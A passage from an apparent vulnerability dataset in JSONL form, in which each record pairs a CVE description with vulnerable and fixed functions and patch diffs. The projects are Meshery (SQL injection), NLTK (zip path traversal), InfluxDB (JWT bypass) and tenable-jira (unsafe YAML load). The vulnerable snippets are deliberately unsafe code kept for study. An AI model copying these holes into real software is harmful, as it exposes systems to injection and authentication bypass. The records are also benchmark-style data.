logging=open('tenable_debug.log').read() \\\n .replace(addr, '') \\\n .replace(sc_addr, ''),\n issuetypes='\\n'.join(\n [\n '{id}: {name}'.format(**a)\n for a in jira.issue_types.list()\n if a.get('name').lower() in ['task', 'subtask', 'sub-task']\n ]\n )\n )\n print(output)\n print('\\n'.join([\n '/-------------------------------NOTICE-----------------------------------\\\\',\n '| The output above is helpful for us to troubleshoot exactly what is |',\n '| happening within the code and offer a diagnosis for how to correct. |',\n '| Please note that while some basic redaction has already been performed |',\n '| that we ask you to review the information you\\'re about to send and |',\n '| ensure that nothing deemed sensitive is transmitted. |',\n '| ---------------------------------------------------------------------- |',\n '| -- Copy of output saved to \"issue_debug.md\" |',\n '\\\\------------------------------------------------------------------------/'\n ]))\n with open('issue_debug.md', 'w') as reportfile:\n print(output, file=reportfile)\n os.remove('tenable_debug.log')\n elif not setup_only:\n ingest.ingest(observed_since)\n\n # If we are expected to continually re-run the transformer, then we will\n # need to track the passage of time and run every X hours, where X is\n # defined by the user in the configuration.\n if config.get('service', {}).get('interval', 0) > 0:\n sleeper = int(config['service']['interval']) * 3600\n while True:\n last_run = int(time.time())\n logging.info(\n 'Sleeping for {}h'.format(sleeper/3600))\n time.sleep(sleeper)\n logging.info(\n 'Initiating ingest with observed_since={}'.format(last_run))\n ingest.ingest(last_run)\n elif setup_only:\n # In setup-only mode, the ingest will not run, and instead a config file\n # will be generated that will have all of the JIRA identifiers baked in\n # and will also inform the integration to ignore the screen builder.\n # When using this config, if there are any changes to the code, then\n # this config will need to be re-generated.\n config['screen']['no_create'] = True\n logging.info('Set to setup-only. Will not run ingest.')\n logging.info('The following is the updated config file from the setup.')\n with open('generated_config.yaml', 'w') as outfile:\n outfile.write(yaml.dump(config, Dumper=yaml.Dumper))\n logging.info('Generated \"generated_config.yaml\" config file.')\n logging.info('This config file should be updated for every new version of this integration.')"}], "vul_patch": "--- a/tenable_jira/cli.py\n+++ b/tenable_jira/cli.py\n@@ -4,7 +4,7 @@\n '''\n # Load the config, but ensure that any additional fields are additive to the\n # basic field set.\n- config_from_file = yaml.load(configfile, Loader=yaml.Loader)\n+ config_from_file = yaml.safe_load(configfile)\n fields = config_from_file.pop('custom_fields', list())\n config = dict_merge(base_config(), config_from_file)\n config['fields'] = config['fields'] + fields\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-35181", "cve_description": "Meshery is an open source, cloud native manager that enables the design and management of Kubernetes-based infrastructure and applications. A SQL injection vulnerability in Meshery prior to version 0.7.22 may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command. Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system. The Meshery project exposes the function `GetMeshSyncResourcesKinds` at the API URL `/api/system/meshsync/resources/kinds`. The order query parameter is directly used to build a SQL query in `meshync_handler.go`. Version 0.7.22 fixes this issue.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/meshery/meshery", "patch_url": ["https://github.com/meshery/meshery/commit/b55f6064d0c6a965aee38f30281f99da7dc4420c", "https://github.com/meshery/meshery/commit/8e995ce21af02d32ef61689c1e1748a745917f13"], "programing_language": "Go", "vul_func": [{"id": "vul_go_278_1", "commit": "c54bc36cbffd82732528ee4eb911616535ebe3ed", "file_path": "mesheryctl/pkg/utils/helpers.go", "start_line": 544, "end_line": 551, "snippet": "func ClearLine() {\n\tclearCmd := exec.Command(\"clear\") // for UNIX-like systems\n\tif runtime.GOOS == \"windows\" {\n\t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n\t}\n\tclearCmd.Stdout = os.Stdout\n\t_ = clearCmd.Run()\n}"}, {"id": "vul_go_278_2", "commit": "c54bc36cbffd82732528ee4eb911616535ebe3ed", "file_path": "server/handlers/meshsync_handler.go", "start_line": 187, "end_line": 254, "snippet": "func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tenc := json.NewEncoder(rw)\n\n\tpage, offset, limit,\n\t\tsearch, order, sort, _ := getPaginationParams(r)\n\n\tfilter := struct {\n\t\tClusterIds []string `json:\"clusterIds\"`\n\t}{}\n\n\tvar kinds []string\n\tvar totalCount int64\n\n\tclusterIds := r.URL.Query().Get(\"clusterIds\")\n\tif clusterIds != \"\" {\n\t\terr := json.Unmarshal([]byte(clusterIds), &filter.ClusterIds)\n\t\tif err != nil {\n\t\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tfilter.ClusterIds = []string{}\n\t}\n\n\tresult := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct(\"kind\").\n\t\tWhere(\"kubernetes_resources.cluster_id IN (?)\", filter.ClusterIds)\n\n\tif search != \"\" {\n\t\tresult = result.Where(\"kubernetes_resources.kind LIKE ?\", \"%\"+search+\"%\")\n\t}\n\n\tif limit != 0 {\n\t\tresult = result.Limit(limit)\n\t}\n\n\tif offset != 0 {\n\t\tresult = result.Offset(offset)\n\t}\n\n\tif order != \"\" {\n\t\tif sort == \"desc\" {\n\t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\t\t} else {\n\t\t\tresult = result.Order(order)\n\t\t}\n\t}\n\n\terr := result.Pluck(\"kinds\", &kinds).Error\n\tif err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresponse := &models.MeshSyncResourcesKindsAPIResponse{\n\t\tKinds: kinds,\n\t\tTotalCount: totalCount,\n\t\tPage: page,\n\t\tPageSize: limit,\n\t}\n\n\tif err := enc.Encode(response); err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t}\n}"}, {"id": "vul_go_278_3", "commit": "c54bc36cbffd82732528ee4eb911616535ebe3ed", "file_path": "server/models/events_persister.go", "start_line": 47, "end_line": 105, "snippet": "func (e *EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {\n\teventsDB := []*events.Event{}\n\tfinder := e.DB.Model(&events.Event{}).Where(\"user_id = ?\", userID)\n\n\tif len(eventsFilter.Category) != 0 {\n\t\tfinder = finder.Where(\"category IN ?\", eventsFilter.Category)\n\t}\n\n\tif len(eventsFilter.Action) != 0 {\n\t\tfinder = finder.Where(\"action IN ?\", eventsFilter.Action)\n\t}\n\n\tif len(eventsFilter.Severity) != 0 {\n\t\tfinder = finder.Where(\"severity IN ?\", eventsFilter.Severity)\n\t}\n\n\tif eventsFilter.Search != \"\" {\n\t\tfinder = finder.Where(\"description LIKE ?\", \"%\"+eventsFilter.Search+\"%\")\n\t}\n\n\tif eventsFilter.Status != \"\" {\n\t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n\t}\n\n\tif eventsFilter.Order == \"asc\" {\n\t\tfinder = finder.Order(eventsFilter.SortOn)\n\t} else {\n\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: eventsFilter.SortOn}, Desc: true})\n\t}\n\n\tvar count int64\n\tfinder.Count(&count)\n\n\tif eventsFilter.Offset != 0 {\n\t\tfinder = finder.Offset(eventsFilter.Offset)\n\t}\n\n\tif eventsFilter.Limit != 0 {\n\t\tfinder = finder.Limit(eventsFilter.Limit)\n\t}\n\n\terr := finder.Scan(&eventsDB).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcountBySeverity, err := e.getCountBySeverity(userID, eventsFilter.Status)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &EventsResponse{\n\t\tEvents: eventsDB,\n\t\tPageSize: eventsFilter.Limit,\n\t\tTotalCount: count,\n\t\tCountBySeverityLevel: countBySeverity,\n\t}, nil\n}"}], "fix_func": [{"id": "fix_go_278_1", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "mesheryctl/pkg/utils/helpers.go", "start_line": 544, "end_line": 554, "snippet": "func ClearLine() {\n\tclearCmd := exec.Command(\"clear\") // for UNIX-like systems\n\tif runtime.GOOS == \"windows\" {\n\t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n\t}\n\tclearCmd.Stdout = os.Stdout\n\terr := clearCmd.Run()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}"}, {"id": "fix_go_278_2", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "server/handlers/meshsync_handler.go", "start_line": 187, "end_line": 255, "snippet": "func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tenc := json.NewEncoder(rw)\n\n\tpage, offset, limit,\n\t\tsearch, order, sort, _ := getPaginationParams(r)\n\n\tfilter := struct {\n\t\tClusterIds []string `json:\"clusterIds\"`\n\t}{}\n\n\tvar kinds []string\n\tvar totalCount int64\n\n\tclusterIds := r.URL.Query().Get(\"clusterIds\")\n\tif clusterIds != \"\" {\n\t\terr := json.Unmarshal([]byte(clusterIds), &filter.ClusterIds)\n\t\tif err != nil {\n\t\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tfilter.ClusterIds = []string{}\n\t}\n\n\tresult := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct(\"kind\").\n\t\tWhere(\"kubernetes_resources.cluster_id IN (?)\", filter.ClusterIds)\n\n\tif search != \"\" {\n\t\tresult = result.Where(\"kubernetes_resources.kind LIKE ?\", \"%\"+search+\"%\")\n\t}\n\n\tif limit != 0 {\n\t\tresult = result.Limit(limit)\n\t}\n\n\tif offset != 0 {\n\t\tresult = result.Offset(offset)\n\t}\n\n\torder = models.SanitizeOrderInput(order, []string{\"created_at\", \"updated_at\", \"name\"})\n\tif order != \"\" {\n\t\tif sort == \"desc\" {\n\t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\t\t} else {\n\t\t\tresult = result.Order(order)\n\t\t}\n\t}\n\n\terr := result.Pluck(\"kinds\", &kinds).Error\n\tif err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresponse := &models.MeshSyncResourcesKindsAPIResponse{\n\t\tKinds: kinds,\n\t\tTotalCount: totalCount,\n\t\tPage: page,\n\t\tPageSize: limit,\n\t}\n\n\tif err := enc.Encode(response); err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t}\n}"}, {"id": "fix_go_278_3", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "server/models/events_persister.go", "start_line": 47, "end_line": 106, "snippet": "func (e *EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {\n\teventsDB := []*events.Event{}\n\tfinder := e.DB.Model(&events.Event{}).Where(\"user_id = ?\", userID)\n\n\tif len(eventsFilter.Category) != 0 {\n\t\tfinder = finder.Where(\"category IN ?\", eventsFilter.Category)\n\t}\n\n\tif len(eventsFilter.Action) != 0 {\n\t\tfinder = finder.Where(\"action IN ?\", eventsFilter.Action)\n\t}\n\n\tif len(eventsFilter.Severity) != 0 {\n\t\tfinder = finder.Where(\"severity IN ?\", eventsFilter.Severity)\n\t}\n\n\tif eventsFilter.Search != \"\" {\n\t\tfinder = finder.Where(\"description LIKE ?\", \"%\"+eventsFilter.Search+\"%\")\n\t}\n\n\tif eventsFilter.Status != \"\" {\n\t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n\t}\n\n\tsortOn := SanitizeOrderInput(eventsFilter.SortOn, []string{\"created_at\", \"updated_at\", \"name\"})\n\tif eventsFilter.Order == \"asc\" {\n\t\tfinder = finder.Order(sortOn)\n\t} else {\n\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: sortOn}, Desc: true})\n\t}\n\n\tvar count int64\n\tfinder.Count(&count)\n\n\tif eventsFilter.Offset != 0 {\n\t\tfinder = finder.Offset(eventsFilter.Offset)\n\t}\n\n\tif eventsFilter.Limit != 0 {\n\t\tfinder = finder.Limit(eventsFilter.Limit)\n\t}\n\n\terr := finder.Scan(&eventsDB).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcountBySeverity, err := e.getCountBySeverity(userID, eventsFilter.Status)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &EventsResponse{\n\t\tEvents: eventsDB,\n\t\tPageSize: eventsFilter.Limit,\n\t\tTotalCount: count,\n\t\tCountBySeverityLevel: countBySeverity,\n\t}, nil\n}"}], "vul_patch": "--- a/mesheryctl/pkg/utils/helpers.go\n+++ b/mesheryctl/pkg/utils/helpers.go\n@@ -4,5 +4,8 @@\n \t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n \t}\n \tclearCmd.Stdout = os.Stdout\n-\t_ = clearCmd.Run()\n+\terr := clearCmd.Run()\n+\tif err != nil {\n+\t\tlog.Fatal(err)\n+\t}\n }\n\n--- a/server/handlers/meshsync_handler.go\n+++ b/server/handlers/meshsync_handler.go\n@@ -39,6 +39,7 @@\n \t\tresult = result.Offset(offset)\n \t}\n \n+\torder = models.SanitizeOrderInput(order, []string{\"created_at\", \"updated_at\", \"name\"})\n \tif order != \"\" {\n \t\tif sort == \"desc\" {\n \t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\n--- a/server/models/events_persister.go\n+++ b/server/models/events_persister.go\n@@ -22,10 +22,11 @@\n \t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n \t}\n \n+\tsortOn := SanitizeOrderInput(eventsFilter.SortOn, []string{\"created_at\", \"updated_at\", \"name\"})\n \tif eventsFilter.Order == \"asc\" {\n-\t\tfinder = finder.Order(eventsFilter.SortOn)\n+\t\tfinder = finder.Order(sortOn)\n \t} else {\n-\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: eventsFilter.SortOn}, Desc: true})\n+\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: sortOn}, Desc: true})\n \t}\n \n \tvar count int64\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-14751", "cve_description": "NLTK Downloader before 3.4.5 is vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in an NLTK package (ZIP archive) that is mishandled during extraction.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/nltk/nltk", "patch_url": ["https://github.com/nltk/nltk/commit/f59d7ed8df2e0e957f7f247fe218032abdbe9a10"], "programing_language": "Python", "vul_func": [{"id": "vul_py_98_1", "commit": "2554ff4", "file_path": "nltk/downloader.py", "start_line": "2249", "end_line": "2300", "snippet": "def _unzip_iter(filename, root, verbose=True):\n if verbose:\n sys.stdout.write('Unzipping %s' % os.path.split(filename)[1])\n sys.stdout.flush()\n\n try:\n zf = zipfile.ZipFile(filename)\n except zipfile.error as e:\n yield ErrorMessage(filename, 'Error with downloaded zip file')\n return\n except Exception as e:\n yield ErrorMessage(filename, e)\n return\n\n # Get lists of directories & files\n namelist = zf.namelist()\n dirlist = set()\n for x in namelist:\n if x.endswith('/'):\n dirlist.add(x)\n else:\n dirlist.add(x.rsplit('/', 1)[0] + '/')\n filelist = [x for x in namelist if not x.endswith('/')]\n\n # Create the target directory if it doesn't exist\n if not os.path.exists(root):\n os.mkdir(root)\n\n # Create the directory structure\n for dirname in sorted(dirlist):\n pieces = dirname[:-1].split('/')\n for i in range(len(pieces)):\n dirpath = os.path.join(root, *pieces[: i + 1])\n if not os.path.exists(dirpath):\n os.mkdir(dirpath)\n\n # Extract files.\n for i, filename in enumerate(filelist):\n filepath = os.path.join(root, *filename.split('/'))\n\n try:\n with open(filepath, 'wb') as dstfile, zf.open(filename) as srcfile:\n shutil.copyfileobj(srcfile, dstfile)\n except Exception as e:\n yield ErrorMessage(filename, e)\n return\n\n if verbose and (i * 10 / len(filelist) > (i - 1) * 10 / len(filelist)):\n sys.stdout.write('.')\n sys.stdout.flush()\n if verbose:\n print()"}], "fix_func": [{"id": "fix_py_98_1", "commit": "f59d7ed", "file_path": "nltk/downloader.py", "start_line": "2249", "end_line": "2266", "snippet": "def _unzip_iter(filename, root, verbose=True):\n if verbose:\n sys.stdout.write('Unzipping %s' % os.path.split(filename)[1])\n sys.stdout.flush()\n\n try:\n zf = zipfile.ZipFile(filename)\n except zipfile.error as e:\n yield ErrorMessage(filename, 'Error with downloaded zip file')\n return\n except Exception as e:\n yield ErrorMessage(filename, e)\n return\n\n zf.extractall(root)\n\n if verbose:\n print()"}], "vul_patch": "--- a/nltk/downloader.py\n+++ b/nltk/downloader.py\n@@ -12,41 +12,7 @@\n yield ErrorMessage(filename, e)\n return\n \n- # Get lists of directories & files\n- namelist = zf.namelist()\n- dirlist = set()\n- for x in namelist:\n- if x.endswith('/'):\n- dirlist.add(x)\n- else:\n- dirlist.add(x.rsplit('/', 1)[0] + '/')\n- filelist = [x for x in namelist if not x.endswith('/')]\n+ zf.extractall(root)\n \n- # Create the target directory if it doesn't exist\n- if not os.path.exists(root):\n- os.mkdir(root)\n-\n- # Create the directory structure\n- for dirname in sorted(dirlist):\n- pieces = dirname[:-1].split('/')\n- for i in range(len(pieces)):\n- dirpath = os.path.join(root, *pieces[: i + 1])\n- if not os.path.exists(dirpath):\n- os.mkdir(dirpath)\n-\n- # Extract files.\n- for i, filename in enumerate(filelist):\n- filepath = os.path.join(root, *filename.split('/'))\n-\n- try:\n- with open(filepath, 'wb') as dstfile, zf.open(filename) as srcfile:\n- shutil.copyfileobj(srcfile, dstfile)\n- except Exception as e:\n- yield ErrorMessage(filename, e)\n- return\n-\n- if verbose and (i * 10 / len(filelist) > (i - 1) * 10 / len(filelist)):\n- sys.stdout.write('.')\n- sys.stdout.flush()\n if verbose:\n print()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-20933", "cve_description": "InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/influxdata/influxdb", "patch_url": ["https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0"], "programing_language": "Go", "vul_func": [{"id": "vul_go_248_1", "commit": "93b56325fc2002513b17662c8d996327d2cb658d", "file_path": "services/httpd/handler.go", "start_line": 1551, "end_line": 1640, "snippet": "func authenticate(inner func(http.ResponseWriter, *http.Request, meta.User), h *Handler, requireAuthentication bool) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t// Return early if we are not authenticating\n\t\tif !requireAuthentication {\n\t\t\tinner(w, r, nil)\n\t\t\treturn\n\t\t}\n\t\tvar user meta.User\n\n\t\t// TODO corylanou: never allow this in the future without users\n\t\tif requireAuthentication && h.MetaClient.AdminUserExists() {\n\t\t\tcreds, err := parseCredentials(r)\n\t\t\tif err != nil {\n\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tswitch creds.Method {\n\t\t\tcase UserAuthentication:\n\t\t\t\tif creds.Username == \"\" {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"username required\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tuser, err = h.MetaClient.Authenticate(creds.Username, creds.Password)\n\t\t\t\tif err != nil {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"authorization failed\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tcase BearerAuthentication:\n\t\t\t\tkeyLookupFn := func(token *jwt.Token) (interface{}, error) {\n\t\t\t\t\t// Check for expected signing method.\n\t\t\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t\t\t\t}\n\t\t\t\t\treturn []byte(h.Config.SharedSecret), nil\n\t\t\t\t}\n\n\t\t\t\t// Parse and validate the token.\n\t\t\t\ttoken, err := jwt.Parse(creds.Token, keyLookupFn)\n\t\t\t\tif err != nil {\n\t\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if !token.Valid {\n\t\t\t\t\th.httpError(w, \"invalid token\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tclaims, ok := token.Claims.(jwt.MapClaims)\n\t\t\t\tif !ok {\n\t\t\t\t\th.httpError(w, \"problem authenticating token\", http.StatusInternalServerError)\n\t\t\t\t\th.Logger.Info(\"Could not assert JWT token claims as jwt.MapClaims\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Make sure an expiration was set on the token.\n\t\t\t\tif exp, ok := claims[\"exp\"].(float64); !ok || exp <= 0.0 {\n\t\t\t\t\th.httpError(w, \"token expiration required\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Get the username from the token.\n\t\t\t\tusername, ok := claims[\"username\"].(string)\n\t\t\t\tif !ok {\n\t\t\t\t\th.httpError(w, \"username in token must be a string\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if username == \"\" {\n\t\t\t\t\th.httpError(w, \"token must contain a username\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Lookup user in the metastore.\n\t\t\t\tif user, err = h.MetaClient.User(username); err != nil {\n\t\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if user == nil {\n\t\t\t\t\th.httpError(w, meta.ErrUserNotFound.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\th.httpError(w, \"unsupported authentication\", http.StatusUnauthorized)\n\t\t\t}\n\n\t\t}\n\t\tinner(w, r, user)\n\t})\n}"}], "fix_func": [{"id": "fix_go_248_1", "commit": "761b557315ff9c1642cf3b0e5797cd3d983a24c0", "file_path": "services/httpd/handler.go", "start_line": 1551, "end_line": 1645, "snippet": "func authenticate(inner func(http.ResponseWriter, *http.Request, meta.User), h *Handler, requireAuthentication bool) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t// Return early if we are not authenticating\n\t\tif !requireAuthentication {\n\t\t\tinner(w, r, nil)\n\t\t\treturn\n\t\t}\n\t\tvar user meta.User\n\n\t\t// TODO corylanou: never allow this in the future without users\n\t\tif requireAuthentication && h.MetaClient.AdminUserExists() {\n\t\t\tcreds, err := parseCredentials(r)\n\t\t\tif err != nil {\n\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tswitch creds.Method {\n\t\t\tcase UserAuthentication:\n\t\t\t\tif creds.Username == \"\" {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"username required\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tuser, err = h.MetaClient.Authenticate(creds.Username, creds.Password)\n\t\t\t\tif err != nil {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"authorization failed\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tcase BearerAuthentication:\n\t\t\t\tif h.Config.SharedSecret == \"\" {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"bearer auth disabled\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tkeyLookupFn := func(token *jwt.Token) (interface{}, error) {\n\t\t\t\t\t// Check for expected signing method.\n\t\t\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t\t\t\t}\n\t\t\t\t\treturn []byte(h.Config.SharedSecret), nil\n\t\t\t\t}\n\n\t\t\t\t// Parse and validate the token.\n\t\t\t\ttoken, err := jwt.Parse(creds.Token, keyLookupFn)\n\t\t\t\tif err != nil {\n\t\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if !token.Valid {\n\t\t\t\t\th.httpError(w, \"invalid token\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tclaims, ok := token.Claims.(jwt.MapClaims)\n\t\t\t\tif !ok {\n\t\t\t\t\th.httpError(w, \"problem authenticating token\", http.StatusInternalServerError)\n\t\t\t\t\th.Logger.Info(\"Could not assert JWT token claims as jwt.MapClaims\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Make sure an expiration was set on the token.\n\t\t\t\tif exp, ok := claims[\"exp\"].(float64); !ok || exp <= 0.0 {\n\t\t\t\t\th.httpError(w, \"token expiration required\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Get the username from the token.\n\t\t\t\tusername, ok := claims[\"username\"].(string)\n\t\t\t\tif !ok {\n\t\t\t\t\th.httpError(w, \"username in token must be a string\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if username == \"\" {\n\t\t\t\t\th.httpError(w, \"token must contain a username\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Lookup user in the metastore.\n\t\t\t\tif user, err = h.MetaClient.User(username); err != nil {\n\t\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if user == nil {\n\t\t\t\t\th.httpError(w, meta.ErrUserNotFound.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\th.httpError(w, \"unsupported authentication\", http.StatusUnauthorized)\n\t\t\t}\n\n\t\t}\n\t\tinner(w, r, user)\n\t})\n}"}], "vul_patch": "--- a/services/httpd/handler.go\n+++ b/services/httpd/handler.go\n@@ -31,6 +31,11 @@\n \t\t\t\t\treturn\n \t\t\t\t}\n \t\t\tcase BearerAuthentication:\n+\t\t\t\tif h.Config.SharedSecret == \"\" {\n+\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n+\t\t\t\t\th.httpError(w, \"bearer auth disabled\", http.StatusUnauthorized)\n+\t\t\t\t\treturn\n+\t\t\t\t}\n \t\t\t\tkeyLookupFn := func(token *jwt.Token) (interface{}, error) {\n \t\t\t\t\t// Check for expected signing method.\n \t\t\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-7712", "cve_description": "This affects the package json before 10.0.0. It is possible to inject arbritary commands using the parseLookup function.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a 